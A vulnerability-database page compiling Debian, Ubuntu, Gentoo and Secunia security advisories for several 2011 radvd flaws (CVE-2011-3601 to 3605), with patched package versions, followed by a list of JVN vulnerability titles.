1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0027	The process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to cause a denial of service (stack-based buffer over-read and crash) via unspecified vectors. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A security vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----

Vulnerabilities are sorted by update time (recent to old).
ID	Description
jvndb-2024-000074	Multiple vulnerabilities in SKYSEA Client View
jvndb-2024-000077	FFRI AMC vulnerable to OS command injection
jvndb-2024-000078	Multiple vulnerabilities in ELECOM wireless LAN routers
jvndb-2024-000081	EC-CUBE plugin (for EC-CUBE 4 series) "EC-CUBE Web API Plugin" vulnerable to stored cross-site scripting
jvndb-2024-000080	EC-CUBE 4 Series improper input validation when installing plugins
jvndb-2024-000028	Multiple vulnerabilities in SKYSEA Client View
jvndb-2024-004595	Multiple vulnerabilities in FutureNet NXR series, VXR series and WXR series
jvndb-2024-000076	SDoP contains a stack-based buffer overflow vulnerability.
jvndb-2024-004623	Multiple products from Check Point Software Technologies vulnerable to information disclosure
jvndb-2024-003242	OMRON NJ/NX series vulnerable to insufficient verification of data authenticity
jvndb-2021-000105	PowerCMS XMLRPC API vulnerable to OS command injection
jvndb-2024-000075	ORC vulnerable to stack-based buffer overflow
jvndb-2022-000030	Multiple vulnerabilities in Operation management interface of FUJITSU Network IPCOM
jvndb-2024-000073	Assimp vulnerable to heap-based buffer overflow
jvndb-2024-000072	Cybozu Garoon vulnerable to cross-site scripting
jvndb-2024-000071	FUJITSU Network Edgiot GW1500 vulnerable to path traversal
jvndb-2023-007150	Multiple vulnerabilities in First Corporation's DVRs
jvndb-2023-000094	Multiple vulnerabilities in WordPress plugin "Welcart e-Commerce"
jvndb-2024-000007	Multiple Dahua Technology products vulnerable to authentication bypass
jvndb-2024-001882	Sharp NEC Display Solutions' public displays vulnerable to local file inclusion
jvndb-2024-000070	Out-of-bounds write vulnerability in Ricoh MFPs and printers
jvndb-2024-000059	Multiple vulnerabilities in multiple Webmin products
jvndb-2024-000069	Cleartext transmission issue in TONE store App to TONE store
jvndb-2024-000068	JP1/Extensible SNMP Agent fails to restrict access permissions
jvndb-2017-000194	WSR-300HP vulnerable to arbitrary code execution
jvndb-2024-003831	Multiple TP-Link products vulnerable to OS command injection
jvndb-2024-000067	"Piccoma" App uses a hard-coded API key for an external service
jvndb-2016-002299	SaAT Netizen fails to properly verify downloaded installation and update files
jvndb-2022-000080	Android App "IIJ SmartKey" vulnerable to information disclosure
jvndb-2023-001774	Multiple vulnerabilities in SolarView Compact